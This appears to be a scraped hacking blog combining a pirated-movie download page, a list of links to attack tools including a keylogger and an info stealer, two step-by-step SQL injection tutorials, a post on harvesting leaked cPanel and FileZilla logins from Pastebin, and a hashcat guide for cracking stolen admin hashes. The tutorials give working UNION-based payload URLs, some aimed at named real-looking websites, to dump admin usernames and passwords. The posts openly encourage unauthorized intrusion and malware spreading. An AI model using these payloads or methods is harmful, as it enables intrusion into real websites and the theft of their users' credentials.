Transformers 3: Dark of The Moon (2011) PPVRip MKV Mediafire

Transformers 3: Dark of The Moon (2011) PPVRip MKV Mediafire

Synopsis
The Autobots learn of a Cybertronian spacecraft hidden on the Moon, and race against the Decepticons to reach it and to learn its secrets.

Genre
Action | Adventure | Sci-Fi

Starring
Shia LaBeouf, Rosie Huntington-Whiteley and Tyrese Gibson

Trailer


Screenshot





Download

MKV (600mb)

MEDIAFIRE
part 1- http://adf.ly/2Xlch
part 2- http://adf.ly/2Xlcz
part 3- http://adf.ly/2XldM

Read More

Hacking tools

Here is a list of tools i have collected over a year odd.

I have posted them as i have had them for a long time and not all the programs might still be easy to find. Im sure some people will appreciate it.

None are made by myself

All are clean 100%

Feel free to ask here how to use a program if not sure.

Exploit scanner

http://www.2shared.com/file/5lZwKbZy/exp...anner.html

Use a Dork to find potential websites with SQL errors ie the site is hackable via a SQL injections.


SQL Helper v2.7

http://www.2shared.com/file/YJ9-janc/SQL_Helper.html

Insert a websites URL and check if its vulnerable to a SQL attack, This can also be done through the program. (The lazy mans SQL tool) MANUAL SQL IS THE WAY.


Admin Page Finder

http://www.2shared.com/file/sFQMy_21/Admin_Finder.html

So you have successfully gained access to a websites database and have located the user and password but you cant find the admin page on the website! This program will find it for you if its online.


Istealer 6.0 Legends

http://www.2shared.com/file/Zf_kHaai/I_Stealer.html

Use a youtube video tutorial if your not sure how they work, Very similar to a rat. Very effective if your good at spreading.


MSN Freez0r V2 (WORKING)

http://www.2shared.com/file/8Hd5OL7z/MSN...0r_V2.html

Enter the email/msn you want to freeze and click the button! very easy and self explanitory. This Freezer does work unless the slave is on automatic sign in.


DD Keylogger

http://www.2shared.com/file/UWJtRnIA/DDkeylogger.html

A simple and effective keylogger you just run the minimise, hide it in your tray and anything typed will be displayed.


Deface Page generator
http://www.2shared.com/file/1fDDaO0_/Def...e_Gen.html


Shell list including uploaders
http://www.2shared.com/file/ndARplOZ/Shell_List.html

Read More

SQL Injection [TUT]

Before we see what SQL Injection is. We should know what SQL and Database are.
Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.


Some List of Database are:

* DB servers,

* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

SQL:

Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name “SQL” is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation
“S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,…) values(corresponding values for columns):
For inserting data to table.
For eg:

insert into users(username,userid) values(“blackstar”,”black”);

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data

* Modifying contents of website
* Shutting down the My SQL server

Now let’s dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use “inurl:” command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

How to use?
copy one of the above command and paste in the google search engine box.

Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

Step 2: Checking the Vulnerability:

Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Step 3: Finding Number of columns:

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(‘) with “order by n” statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown column “.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1

http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

change the number until you get the error as “unknown column”

if you get the error while trying the “x”th number,then no of column is “x-1″.

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)

http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)


so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the “–” at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using “union select columns_sequence” we can find the vulnerable part of the table. Replace the “order by n” with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than ‘x’ value, i mean less than or equl to number of columns).

Like this:


Now select 1 number.
It showing 3,7. Let’s take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with “version()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
if the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related with the admin or user.



Now select the “admin ” table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the “group_concat(table_name) with the “group_concat(column_name)”

Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()


This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the “mysqlchar”
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas​​ ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..​etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”

For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/

http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls.

Read More

SQL [TUT]

I have not included tutorial for version less than 4 and blind coz according to me more than 80 % sql injections this way :biggrin:

1. USE DORKS TO FIND SITES

http://f47al3rr0r.net/forum/showthread.php?tid=10

Credits : Biohazard

2.CHECK WHETHER THE SITE IS VULNERABLE

put a ' infront of the page .

if it does not reload in its original format it is vulnerable .

eg.

Nothing is shown on page So it might be possible it is vulnerable

P.S:

P.S:
if you get error like this it is not MYSQL injection it's MSSQL


/ Microsoft Access ODBC driver /

/ Open quotation /

/ Microsoft Amos DB provider for Oracle /

/ Division by zero in /

so find a good MSSQL tutorial

3.FINDING NUMBER OF COLUMNS IN SQL DATABASE

Quote:http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10-- ERROR

SO COLUMN NUMBER IS BETWEEN 1 AND 10

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5-- ERROR
SO COLUMN NUMBER IS BETWEEN 1 AND 5

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO COLUMNS IN DATABASE IS 4


4:CHECK IF UNION STATEMENT IS WORKING AND FIND VULNERABLE COLUMNS

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--

watch out for minus i placed before web page number .
we do it so website only returns header and we can see useful information .
see the numbers it is showing on page .
that are the injectable column numbers

5:CHECK DATABASE VERSION

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--

VERSION 5.0.83 cheers

6:FINDING TABLE NAMES

This sub-section is divided into two parts :

6A:WHEN ALL TABLE NAME IS SHOWED AT ONCE

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--

in this case we will see which tables are interesting
tblUsers intrigues me in this case :hehe:

6B:WHEN ONLY ONE TABLE NAME IS SHOWN THAT ALSO SOMETHING LIKE CHARACTER_SETS
here we use limit statements
example :
check this


http://www.medicalmarijuanainformation.c...roupID=-13 union select all table_name from information_schema.tables--


you will get same problem here which i mentioned above.

so your way forward will be

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 0,1--


then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 1,1--

then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 2,1--

till

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 17,1--

Use magic quotes trick to find column name along with limit ..

7. FIND COLUMNS IN DATABASE
this sub section has been divided into 2 parts :

7A.FINDING COLUMNS IN A PARTICULAR TABLE

http://www.medicalmarijuanainformation.c...roupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
here only one column name is displaying so i am using limit statement otherwise it would be unnecessary .
It only works if MAGIC QUOTES is off .
single quotes i placed table name is important .
IF IT doesn't work it try hexing the table name .
Google to find a hex converter and put in table name there and get it's hex .

7B.FINDING ALL COLUMN NAMES

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--


If only one column name is displaying then use the limit statement like shown above

8.DISPLAYING USER NAMES AND PASSWORDS
0x3a is hex form of ":".

http://www.medicalmarijuanainformation.c...roupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --

Quote:http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --


cracking hash , finding the hash type , finding admin page etc are out of scope of this tutorial .

Read More

Beginner freindly

I've been searching for days of the best way to get information for a few sites and FileZilla information and I've found the easiest way to get most site(s) information.

In this tutorial I will share a way that I've got four websites for my team "Team Ownage", I will also give you the deface if wanted, I've got the following websites from this hacking way;
http://payingeveryday.com/
http://joomlachat.org
http://www.osninjas.info/
http://tonrak.net/

This way might of been released before but I've got the way of getting a 99.9% of a receiving information, I've found information for hundreds of things but this way does have complications, once this thread gets posted loads of users will be doing this so it'll be patched very quickly, I will be looking for way more ways of doing this with better websites.

Now let's get to the way of this lovely hack, go to http://pastebin.com, head over to the search button and search the following information from the list below;

"Cpanel Info"
"FileZilla Info"
"Minecraft Info"
"2083 info"
All of those give you a 99.9% of chance getting a website, it may take time getting a working website since loads of users might be doing this so don't expect it to work. Please don't use the "" only the information between it.

I hope this helps those users that cannot be asked to read the basics or are totally retarded(not mentioning anyone just saying), this took me around 3 days to get all the information and if you'll just take time to say thank you or even +rep me(if wanted, not asking don't need) I'll be grateful, I hope you all enjoy this.
IP Address: Logged

Read More

GodMode Windows 7

It is very simple and useful. With that you can see all applications witch are important on windows. Simply create a new folder and rename it to

Code:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Read More

How to crack a Hash

~How to crack a Hash~

First if you hack some website and get crypted admin password and you don't know what kind of password you get, I suggest you first to read this thread: Hash Types - Must See and you will cracking program. I Recommend you hashcat. Hashcat is advanced password recovery software, It can work on Windows as on Linux, it can crack next hash with these algorithms: 

Code:

MD5
    md5($pass.$salt)
    md5($salt.$pass)
    md5(md5($pass))
    md5(md5(md5($pass)))
    md5(md5($pass).$salt)
    md5(md5($salt).$pass)
    md5($salt.md5($pass))
    md5($salt.$pass.$salt)
    md5(md5($salt).md5($pass))
    md5(md5($pass).md5($salt))
    md5($salt.md5($salt.$pass))
    md5($salt.md5($pass.$salt))
    md5($username.0.$pass)
    md5(strtoupper(md5($pass)))
    SHA1
    sha1($pass.$salt)
    sha1($salt.$pass)
    sha1(sha1($pass))
    sha1(sha1(sha1($pass)))
    sha1(strtolower($username).$pass)
    MySQL
    MySQL4.1/MySQL5
    MD5(Wordpress)
    MD5(phpBB3)
    MD5(Unix)
    SHA-1(Base64)
    SSHA-1(Base64)
    SHA-1(Django)
    MD4
    NTLM
    Domain Cached Credentials
    MD5(Chap)
    MSSQL
    SHA256
    MD5(APR)
    SHA512
    SHA-512(Unix)

Download Link: Hashcat Advanced password recovery


The download is adbove on website. When you download it and extract you will find two files: hashcat-gui32 and hashcat-gui64. Depends on what system you have x64 or x86 you will chose between those. When you chose and open one of that you will be asked what hardware device you like to use. I recommend you to use NVIDIA but you can crack with CPU too. It depends on your PC configuration. Now open a new document in notepad and paste the your hash and save it. Now back top hashcat and follow instructions by numbers

[1] - Here you load your .txt file with your hash inside 
[2] - Chose mode to crack password. You can use Tables or Combination but I think that Brute force is almost guarantied.
[3] - Chose your hash type, repeat if you don't know what is it read this Hash Types - Must See
[4] - Set length of password, here you must guess it. Bigger password longer cracking
[5] - What Charset (words) will be used for password. If you can add your custom if you want, like: !@#$%^&*()_+-ABCDEFG.....
[6] - Finally click start and cracking should begin. The new black command-promt screnn should appear and that means that cracking is in progress. If you want periodically you can press Enter to see the progress of cracking.

Read More